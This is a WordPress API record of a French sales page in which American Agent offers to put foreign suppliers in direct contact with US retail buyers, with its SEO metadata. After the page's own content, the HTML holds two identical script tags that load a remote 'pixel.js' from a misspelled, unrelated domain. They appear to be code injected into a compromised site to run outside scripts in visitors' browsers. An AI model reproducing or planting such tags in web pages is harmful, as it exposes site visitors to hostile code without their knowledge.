{"id":3104,"date":"2014-08-30T10:05:23","date_gmt":"2014-08-30T14:05:23","guid":{"rendered":"https:\/\/americanagent.com\/direct-usa-sales-2-2\/"},"modified":"2014-09-18T11:06:23","modified_gmt":"2014-09-18T15:06:23","slug":"vendre-directement-aux-etats-unis","status":"publish","type":"page","link":"https:\/\/americanagent.com\/fr\/vendre-directement-aux-etats-unis\/","title":{"rendered":"Vendre en direct aux \u00c9tats-Unis"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-980bdeceb315cc73925c978026c108bd\">\n#top .av-special-heading.av-av_heading-980bdeceb315cc73925c978026c108bd{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-980bdeceb315cc73925c978026c108bd .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-980bdeceb315cc73925c978026c108bd .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-980bdeceb315cc73925c978026c108bd av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Comment vendre aux \u00c9tats-Unis<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-5423793a0e82d2455362b4eba580b48d '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p><span style=\"color: #000000;\">American Agent est en mesure de g\u00e9n\u00e9rer des efforts de ventes communautaires puissants et directs.<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">Beaucoup d&#8217;entreprises am\u00e9ricaines exigent aujourd&#8217;hui des relations directes avec leurs fournisseurs. Les acheteurs ou d\u00e9partements des achats, en particulier dans le secteur de la vente au d\u00e9tail, ont des consignes strictes pour ne travailler qu\u2019avec des producteurs et des fournisseurs offrant des relations d&#8217;achat directs et une tarification sans interm\u00e9diaire. Les \u00ab\u00a0repr\u00e9sentants commerciaux \u00e0 la commission\u00a0\u00bb et \u00ab\u00a0repr\u00e9sentants de fabricants\u00a0\u00bb, et autres \u00ab\u00a0importateurs\u00a0\u00bb ne sont plus de mise.<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">Pour ces raisons, beaucoup de compagnies n&#8217;obtiennent jamais l&#8217;aval initial des acheteurs am\u00e9ricains et des d\u00e9partements des achats. Nous comprenons bien que l&#8217;utilisation de repr\u00e9sentants \u00e0 la commission (repr\u00e9sentant r\u00e9mun\u00e9r\u00e9s sur un pourcentage des ventes) est peut-\u00eatre la fa\u00e7on dont vous fonctionnez depuis des d\u00e9cennies, malheureusement, ici aux \u00c9tats-Unis ce type d&#8217;approche ne peut pas vous permettre d&#8217;atteindre les r\u00e9sultats de vente que vous en droit d&#8217;attendre. Tous les jours nous sommes contact\u00e9s par des entreprises qui r\u00e9alisent cela, seulement apr\u00e8s avoir investi beaucoup d&#8217;\u00e9nergie, de temps et d&#8217;argent pour p\u00e9n\u00e9trer sur le march\u00e9 am\u00e9ricain.<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">Comment pouvons-nous aider\u00a0?<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">Notre bureau \u00e9tudie vos entreprises cibles et celles de ventes au d\u00e9tail ou grands magasins de notre base de donn\u00e9es. Nous pouvons approcher chacun et vous pr\u00e9senter \u00e0 l&#8217;acheteur responsable du secteur sp\u00e9cifique de vos marchandises. Quel que soit votre produit, notre bureau peut vous aider \u00e0 franchir ces \u00e9tapes initiales, efficacement et sans perdre un temps pr\u00e9cieux. Notre objectif est de vous obtenir des contacts, des examens de produit afin que vous puissiez int\u00e9grer leur liste de fournisseurs approuv\u00e9s.<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">Bon nombre de ces acheteurs savent d\u00e9j\u00e0 que nous ne nous impliquons pas les questions de prix et que nous les contactons pour pr\u00e9senter et \u00e9tablir une relation directe avec votre bureau (tarification directe), et pour ceux qui ne nous connaissent pas, c&#8217;est l&#8217;une des premi\u00e8res choses que nous expliquons, comme sur la premi\u00e8re page de notre site Web. De cette fa\u00e7on, nous sommes en mesure de susciter leur int\u00e9r\u00eat et engager le processus de vente pour vous.<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">Collaborer avec notre bureau vous permet de rester concentr\u00e9 sur les territoires au plus pr\u00e8s de votre fuseau horaire, nous vous sollicitons seulement quand un contact am\u00e9ricain qualifi\u00e9 exprime un int\u00e9r\u00eat solide et sincere. Vous pouvez nous consid\u00e9rer comme votre propre bureau de ventes am\u00e9ricain.<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">Consultez aussi notre page \u00ab\u00a0Support\u00a0\u00bb. Approcher le march\u00e9 am\u00e9ricain directement sugg\u00e8re que vous soyez aussi pr\u00e9sents dans d&#8217;autres zones.<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">American Agent est pr\u00e9par\u00e9 \u00e0 trouver les meilleures solutions pour votre situation, et vous aider \u00e0 mettre en place une solution compl\u00e8te de vente aupr\u00e8s des entreprises am\u00e9ricaines.<\/span><\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":2,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3104","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Vendre en direct aux \u00c9tats-Unis, Ventes aux \u00c9tats-Unis<\/title>\n<meta name=\"description\" content=\"Vendre vos produits directement aux \u00c9tats-Unis. Nous pouvons approcher chacun et vous pr\u00e9senter \u00e0 l&#039;acheteur responsable du secteur sp\u00e9cifique.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/fr\/vendre-directement-aux-etats-unis\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Vendre en direct aux \u00c9tats-Unis, Ventes aux \u00c9tats-Unis\" \/>\n<meta property=\"og:description\" content=\"Vendre vos produits directement aux \u00c9tats-Unis. Nous pouvons approcher chacun et vous pr\u00e9senter \u00e0 l&#039;acheteur responsable du secteur sp\u00e9cifique.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/fr\/vendre-directement-aux-etats-unis\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-18T15:06:23+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/vendre-directement-aux-etats-unis\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/vendre-directement-aux-etats-unis\\\/\",\"name\":\"Vendre en direct aux \u00c9tats-Unis, Ventes aux \u00c9tats-Unis\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#website\"},\"datePublished\":\"2014-08-30T14:05:23+00:00\",\"dateModified\":\"2014-09-18T15:06:23+00:00\",\"description\":\"Vendre vos produits directement aux \u00c9tats-Unis. Nous pouvons approcher chacun et vous pr\u00e9senter \u00e0 l'acheteur responsable du secteur sp\u00e9cifique.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/vendre-directement-aux-etats-unis\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/fr\\\/vendre-directement-aux-etats-unis\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/vendre-directement-aux-etats-unis\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Vendre en direct aux \u00c9tats-Unis\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Vendre en direct aux \u00c9tats-Unis, Ventes aux \u00c9tats-Unis","description":"Vendre vos produits directement aux \u00c9tats-Unis. Nous pouvons approcher chacun et vous pr\u00e9senter \u00e0 l'acheteur responsable du secteur sp\u00e9cifique.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/fr\/vendre-directement-aux-etats-unis\/","og_locale":"fr_FR","og_type":"article","og_title":"Vendre en direct aux \u00c9tats-Unis, Ventes aux \u00c9tats-Unis","og_description":"Vendre vos produits directement aux \u00c9tats-Unis. Nous pouvons approcher chacun et vous pr\u00e9senter \u00e0 l'acheteur responsable du secteur sp\u00e9cifique.","og_url":"https:\/\/americanagent.com\/fr\/vendre-directement-aux-etats-unis\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-18T15:06:23+00:00","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/fr\/vendre-directement-aux-etats-unis\/","url":"https:\/\/americanagent.com\/fr\/vendre-directement-aux-etats-unis\/","name":"Vendre en direct aux \u00c9tats-Unis, Ventes aux \u00c9tats-Unis","isPartOf":{"@id":"https:\/\/americanagent.com\/fr\/#website"},"datePublished":"2014-08-30T14:05:23+00:00","dateModified":"2014-09-18T15:06:23+00:00","description":"Vendre vos produits directement aux \u00c9tats-Unis. Nous pouvons approcher chacun et vous pr\u00e9senter \u00e0 l'acheteur responsable du secteur sp\u00e9cifique.","breadcrumb":{"@id":"https:\/\/americanagent.com\/fr\/vendre-directement-aux-etats-unis\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/fr\/vendre-directement-aux-etats-unis\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/fr\/vendre-directement-aux-etats-unis\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Vendre en direct aux \u00c9tats-Unis"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/fr\/#website","url":"https:\/\/americanagent.com\/fr\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages\/3104","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/comments?post=3104"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages\/3104\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/media?parent=3104"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}